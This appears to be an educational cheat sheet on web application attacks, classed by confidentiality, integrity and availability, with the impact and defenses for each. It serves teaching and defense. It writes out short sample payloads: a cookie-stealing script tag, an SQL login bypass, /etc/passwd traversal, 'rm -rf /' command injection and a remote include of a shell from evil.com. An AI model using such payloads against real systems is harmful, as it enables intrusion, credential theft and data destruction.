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kgdzdkhywxg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Web Application Attacks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fc9qioyk4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1. Confidentiality Attacks (steal secrets)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0byodll2u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Cross-Site Scripting (XSS)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Injecting malicious JavaScript into web pages.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Attacker posts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&lt;script&gt;document.cookie&lt;/script&gt;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a forum → steals session cookies.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Session hijacking, account takeover.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Input validation, output encoding, CSP, HttpOnly cookies.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ad5g1lyvr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 Injection (SQLi)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Injecting malicious SQL into queries.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Login field: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admin' OR '1'='1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bypass authentication.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Database dumps, credential theft.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Parameterized queries, stored procedures, input sanitization.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0ezvciln6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Traversal (Path Traversal)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Manipulating file paths to access restricted data.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download.php?file=../../etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals system files.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Leakage of sensitive configs.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Sanitize file inputs, restrict directories, sandbox file access.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ed6ut3wua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 2. Integrity Attacks (tampering, unauthorized changes)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4f8vubdpc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Cross-Site Request Forgery (CSRF)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Forcing a logged-in user to perform unwanted actions.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Victim clicks hidden image link → transfers money without knowing.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Unauthorized transactions, data modification.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Anti-CSRF tokens, SameSite cookies, re-authentication for sensitive actions.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k1wnuijyo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Injection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Web app passes input directly into OS commands.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Search box input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 rm -rf /</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> deletes server files.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Remote code execution, system control.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Validate/whitelist inputs, avoid shell calls.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ht3dbs4xk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 Tampering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Modifying hidden parameters or query strings.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cart?item=1&amp;price=1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attacker changes price to 0.01.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Data corruption, fraud.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Server-side validation, HMAC on parameters.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8u6oiprar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 3. Availability Attacks (taking site down)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cmm5ry5rv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Denial of Service (DoS/DDoS)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Overloading a web app with traffic.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Botnet floods login page with fake requests.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Website crashes, service downtime.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WAF, CDNs, rate limiting, load balancing.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56zfeawx6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 Exhaustion (Slowloris)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Holding connections open without finishing requests.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Attacker sends partial HTTP requests → server threads get stuck.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Server freeze.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Timeouts, reverse proxies.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3q3kxx4yu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 4. Other Common Web Threats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trdqmb6pu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Hijacking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Stealing or predicting valid session IDs.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Attacker grabs cookie over unencrypted Wi-Fi.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Full account takeover.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TLS encryption, HttpOnly/Secure cookies, regenerate session IDs.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kiq8mepcg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Clickjacking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Trick user into clicking hidden UI (iframe overlay).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Malicious page loads banking site in invisible iframe over a “Play” button.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User unknowingly transfers money.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X-Frame-Options header, CSP frame-ancestors.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whlkquthhx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Inclusion (LFI/RFI)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What:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker includes local or remote files in a vulnerable web app.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page=../../../../etc/passwd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page=http://evil.com/shell.txt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Local file read, remote code execution.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Defense:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable remote includes, whitelist file paths.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jeckz7opr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 Key Defenses (Web App Security Basics)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(sanitize all user input).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encoding (escape before rendering to browser).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Parameterized queries (stop SQLi).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tokens &amp; secure cookies.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TLS everywhere (stop session hijacking).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headers (CSP, X-Frame-Options, HSTS).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WAF (Web Application Firewall) for layered defense.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Summary Mental Model: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Confidentiality → Steal data (SQLi, XSS, Traversal, Session Hijacking).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Integrity → Tamper with actions (CSRF, Command Injection, Param Tampering).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Availability → Take site down (DoS, Resource Exhaustion).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